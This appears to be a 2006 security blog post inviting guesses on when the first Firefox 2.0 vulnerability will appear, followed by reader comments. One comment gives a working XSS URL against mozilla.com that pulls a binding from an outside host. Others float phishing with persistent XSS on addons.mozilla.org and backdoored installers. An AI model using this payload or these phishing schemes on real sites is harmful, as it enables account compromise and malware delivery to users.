Monday, October 23, 2006
Place your bets on the first Firefox 2 vuln
On the heals of the Internet Explorer 7 release, comes the much anticipated Firefox 2.0. Officially released tommorrow. Every new major browser release brings new interest from the security research community looking for greener pastures. In IE7 the time-to-first-disclosed-vuln was under 24 hours. What do you think it'll be for FF2.0? I'll say 3 days, post your guess below.
Subscribe to:
Post Comments (Atom)
18 comments:
48 hours.
48 hours.
i'll go with 5 days.. and zero for their website
http://www.mozilla.com/en-US/products/download.html?product=-%22%20style%3D%22-moz-binding:url('http://ha.ckers.org/xssmoz.xml%23xss')%3bxx:expression(alert('XSS'))%22%3E%3Cx%20&os=1&lang=1
(easier to just click my name)
well nevermind, bloggers a pain in multiple ways.. but you get the idea..
*points to:*
http://sla.ckers.org/forum/read
.php?3,44,2090,page=21#msg-2090
Maluc, you rock...
Using that, you can potentially load .xpi through phishing... eesh!
I give it less than a week (and if I worked for Microsoft I'd make sure of that).
Nevermind you need to find one in addons.mozilla.org or update.mozilla.org, Maluc. At least if you want to be super sneaky.
heh, i'll see what i can do..
but in the meantime, sending phishing emails advertising Firefox 2 with links to mozilla that downloads a backdoored install file could work pretty well too. That's a badly worded sentence but u get the idea..
well.. i found one on addons.mozilla.org .. and persistent. But, don't the victims still need to press the install button for them to be downloaded..? Also, the .xpi files look to be hosted on releases.mozilla.org
So it can definitely be used for phishing if they can be convinced to click install.. but i'm not sure about an automatic way
less than that: http://lcamtuf.coredump.cx/ffoxdie.html
The exploitable part of ffoxdie was fixed in the 1.5.0.7 release. What remains is a stack recursion crash due to an insanely deep XML tree.
You can annoy someone, but does not appear exploitable. https://bugzilla.mozilla.org/show_bug.cgi?id=348514
Not that that's an excuse for leaving a highly publicised crash in the browser
ffoxdie also affects IE7
What do you call a vuln? Do you simply mean security related bugs or must there be for example a code execution possibility?
Regards,
Sven
24 hours for 1st vuln disclosure
32 hours for 1st p0c
48 hours for 1st use of above vuln by phishers/spammers
52 hours for 1st moan by security blog
53 hours for 1st moan by nerd camp
Call me old, but history repeats itself when it comes to software :0)
Either is fine by me. No need to quibble over sematics.
Ok, let's start with something not so difficult. I've posted in my Blog at www.disenchant.ch two ways how someone can bypass the new phishing-filter very easy.
I found these two ways in about 30 minutes so it shouldn't be such a problem to find more ways.
PS:The first one isn't very interesting I know :P
Regards,
Sven
It seems like there was an anomaly in my Firefox. Option 2. will not work in the way I described in my Blog. It’s interesting anyway that the message which says that it’s a phishing site poping up about one second later as it does if you directly navigate to the same site. Sorry for false alarm :(
4 days
- zeno
Post a Comment